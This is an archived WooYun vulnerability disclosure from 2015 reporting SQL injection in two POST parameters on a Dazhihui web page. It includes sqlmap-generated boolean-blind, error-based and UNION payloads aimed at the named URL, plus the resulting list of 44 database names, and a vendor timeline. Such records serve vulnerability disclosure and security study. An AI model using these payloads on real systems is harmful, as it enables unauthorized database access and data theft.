乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-06: 细节已通知厂商并且等待厂商处理中 2015-04-07: 厂商已经主动忽略漏洞,细节向公众公开
大智慧某站存在SQL注入涉及44个库
问题处:http://dts.gw.com.cn/outlets.phpPOST下
area_selet1=0&area_selet2=0
两个参数都存在注入
Place: POSTParameter: area_selet1 Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: area_selet1=0' RLIKE IF(1889=1889,0,0x28) AND 'ajCw'='ajCw&area_selet2=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: area_selet1=0' AND (SELECT 4202 FROM(SELECT COUNT(*),CONCAT(0x3a716f783a,(SELECT (CASE WHEN (4202=4202) THEN 1 ELSE 0 END)),0x3a6d75683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tjfe'='tjfe&area_selet2=0 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: area_selet1=0' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a716f783a,0x476a594b666459495448,0x3a6d75683a),NULL#&area_selet2=0---[09:21:49] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5.0[09:21:49] [INFO] fetching database namesavailable databases [44]:[*] dzh_13file[*] dzh_20141212[*] dzh_365cj[*] dzh_365tuangou[*] dzh_agds[*] dzh_billboardhot[*] dzh_cgds[*] dzh_cldsy[*] dzh_cpgm[*] dzh_dati[*] dzh_dhhy[*] dzh_dts[*] dzh_dtsgathering[*] dzh_fxs[*] dzh_gddyj[*] dzh_gjb[*] dzh_gold230[*] dzh_gw_times[*] dzh_gxycp[*] dzh_hd_roger[*] dzh_hd_sj[*] dzh_hd_sjs[*] dzh_hd_zk[*] dzh_investor[*] dzh_msyl[*] dzh_peixun[*] dzh_pxck[*] dzh_tg[*] dzh_tmall[*] dzh_tongye[*] dzh_tuan_new[*] dzh_tybaobiao[*] dzh_ycpcj[*] dzhsp[*] gtry[*] gtry2[*] hjt[*] information_schema[*] mysql[*] ttxs[*] ttxsback[*] wapycp[*] worldcup2014[*] zhihuiri_20140519
RT
危害等级:无影响厂商忽略
忽略时间:2015-04-07 10:18
公司产品网站负责人已处理恢复。
漏洞Rank:10 (WooYun评价)
2015-04-07:beta测试环境,测试负责人已处理完毕。